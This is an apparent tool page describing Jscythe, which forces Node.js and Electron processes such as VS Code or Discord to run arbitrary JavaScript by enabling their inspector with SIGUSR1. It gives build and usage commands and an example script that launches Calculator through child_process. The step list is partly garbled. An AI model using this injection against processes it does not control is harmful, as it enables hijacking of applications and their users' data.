Jscythe abuses the node.js inspector mechanism in order to force any node.js/electron/v8 based process to execute arbitrary javascript code, even if their debugging capabilities are disabled.
Tested and working against Visual Studio Code, Discord, any Node.js application and more!
SIGUSR1 signal to the process, this will enable the debugger on a port (depending on the software, sometimes it’s random, sometimes it’s not).SIGUSR1.http://localhost:<port>/json.Runtime.evaluate request with the provided code.cargo build --release
Target a specific process and execute a basic expression:
./target/debug/jscythe --pid 666 --code "5 - 3 + 2"
Execute code from a file:
./target/debug/jscythe --pid 666 --script example_script.js
The example_script.js can require any node module and execute any code, like:
require('child_process').spawnSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator', { encoding : 'utf8' }).stdout Search process by expression:
./target/debug/jscythe --search extensionHost --script example_script.js
Run jscythe --help for the complete list of options.
The Windows Registry Editor lets you easily view and control critical Windows system and application…
In the rapidly expanding Internet of Things (IoT) ecosystem, billions of devices are constantly exchanging…
Have you ever come across a picture on the internet and wondered where it came…
Overview WhatsMyName is a free, community-driven OSINT tool designed to identify where a username exists…
Managing disk usage is a crucial task for Linux users and administrators alike. Understanding which…
Efficient disk space management is vital in Linux, especially for system administrators who manage servers…